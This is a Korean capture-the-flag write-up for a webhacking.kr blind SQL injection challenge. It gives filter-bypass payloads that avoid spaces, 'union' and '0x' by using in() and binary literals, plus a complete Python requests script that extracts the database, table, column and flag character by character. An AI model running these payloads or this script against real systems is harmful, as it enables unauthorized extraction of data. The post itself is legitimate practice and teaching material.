반응형
문제
문제풀이
입력값이 1일 때, 0일 때, 그 외 출력결과이다.
blind injection으로 flag 값을 얻을 수 있다.
union, like, 공백, >, <, 0x 등 문자가 필터링 된다.
# db_len
if(length(database())in(db길이),1,0)
# db_name
if(ord(substr(database(),db이름인덱스,1))in(아스키코드),1,0)
# tb_len
# if((select table_name from information_schema.tables where table_schema="chall13" limit 0,1),1,0)
if(select(length(min(if((select(table_schema)from(database())),table_name,null))))from(information_schema.tables))in({tb길이},1,0)
# tb_name
if(ord((select(substr(min(if((select(table_schema)from(database())),table_name,null)),tb이름인덱스,1))from(information_schema.tables))in(아스키코드),1,0)
# col_len
# if(select column_name from information_schema.columns where table_name=”flag_” limit 0,1),1,0)
if((select(length(min(if((select(table_name)in(0b01100110011011000110000101100111010111110110000101100010001101110011001100110011001101110011011000111000)),column_name,null))))from(information_schema.columns))in(col길이),1,0)
# col_name
if(ord((select(substr(min(if((select(table_name)in(0b01100110011011000110000101100111010111110110000101100010001101110011001100110011001101110011011000111000)),column_name,null)),1,1))from(information_schema.columns)))in(아스키코드),1,0)
# flag_len
if((select(length(max(flag_3a55b31d)))from(chall13.flag_ab733768))in(27),1,0)
# flag_name
if(ord((select(substr(max(flag_3a55b31d),1,1))from(chall13.flag_ab733768)))in(70),1,0)import requests
cookie={"cookie":"'PHPSESSID'='bmvg2k4nh4momseflhkh18371h'"}
# database length
for i in range(0,50):
query="if(length(database())in({}),1,0)".format(i)
url="https://webhacking.kr/challenge/web-10/?no={}".format(query)
res=requests.get(url,cookies=cookie)
if (res.text.find("<td>1</td>")!=-1):
print("길이:{}".format(i))
len=i
break
# database name
keyword="abcdefghijklmnopqrstuvwxyz0123456789ABCDEFFGHIJKLMNOPQRSTUVWXYZ"
db_name=""
for i in range(1,len+1):
for key in keyword:
query="if(ord(substr(database(),{},1))in({}),1,0)".format(i,ord(key))
url="https://webhacking.kr/challenge/web-10/?no={}".format(query)
res=requests.get(url,cookies=cookie)
if (res.text.find("<td>1</td>")!=-1):
db_name+=key
print(db_name)
break
print("database:{}".format(db_name))
# table length
tb_len=0
for i in range(0,50):
query="if((select(length(min(if((select(table_schema)in(database())),table_name,null))))from(information_schema.tables))in({}),1,0)".format(i)
url="https://webhacking.kr/challenge/web-10/?no={}".format(query)
res=requests.get(url,cookies=cookie)
if (res.text.find("<td>1</td>")!=-1):
print("table 길이:{}".format(i))
tb_len=i
break
# table_name
tb_name=""
for i in range(1,tb_len+1):
for j in range(48,123):
query="if(ord((select(substr(min(if((select(table_schema)in(database())),table_name,null)),{},1))from(information_schema.tables)))in({}),1,0)".format(i,j)
url="https://webhacking.kr/challenge/web-10/?no={}".format(query)
res=requests.get(url,cookies=cookie)
if (res.text.find("<td>1</td>")!=-1):
tb_name+=chr(j)
print(tb_name)
break
tb_name2=tb_name
print("tb_name:{}".format(tb_name))
# col_len
col_len=0
tb_name="flag_ab733768"
tb_name='0b'+''.join(format(ord(i),'b').zfill(8) for i in tb_name)
print(tb_name)
for i in range(0,50):
query="if((select(length(min(if((select(table_name)in({})),column_name,null))))from(information_schema.columns))in({}),1,0)".format(tb_name,i)
url="https://webhacking.kr/challenge/web-10/?no={}".format(query)
res=requests.get(url,cookies=cookie)
if (res.text.find("<td>1</td>")!=-1):
print("column 길이:{}".format(i))
col_len=i
break
# col_name
col_name=""
for i in range(1,col_len+1):
for j in range(48,123):
query="if(ord((select(substr(min(if((select(table_name)in({})),column_name,null)),{},1))from(information_schema.columns)))in({}),1,0)".format(tb_name,i,j)
url="https://webhacking.kr/challenge/web-10/?no={}".format(query)
res=requests.get(url,cookies=cookie)
if (res.text.find("<td>1</td>")!=-1):
col_name+=chr(j)
print(col_name)
break
print("col_name:{}".format(col_name))
# len
flag_len=0
for i in range(0,50):
query="if((select(length(max({})))from({}.{}))in({}),1,0)".format(col_name,db_name,tb_name2,i)
url="https://webhacking.kr/challenge/web-10/?no={}".format(query)
res=requests.get(url,cookies=cookie)
if (res.text.find("<td>1</td>")!=-1):
print("flag 길이:{}".format(i))
flag_len=i
break
# flag
flag=""
for i in range(1,flag_len+1):
for j in range(48,123):
query="if(ord((select(substr(max({}),{},1))from({}.{})))in({}),1,0)".format(col_name,i,db_name,tb_name2,j)
url="https://webhacking.kr/challenge/web-10/?no={}".format(query)
res=requests.get(url,cookies=cookie)
if (res.text.find("<td>1</td>")!=-1):
flag+=chr(j)
print(flag)
break
print("flag:{}".format(flag))str→ascii : ord()
ascii→str : chr()
limit 0,1 : 1번째부터 1개의 자료 보여줌 (0부터 시작하므로 0번째는 1)
반응형
'write-up(web) > webhacking.kr' 카테고리의 다른 글
| [Webhacking.kr] old-19 (1) | 2023.11.02 |
|---|---|
| [Webhacking.kr] old-18 (0) | 2023.11.02 |
| [Webhacking.kr] old-12 (0) | 2023.10.17 |
| [Webhacking.kr] old-11 (0) | 2023.10.17 |
| [Webhacking.kr] old-10 (0) | 2023.10.17 |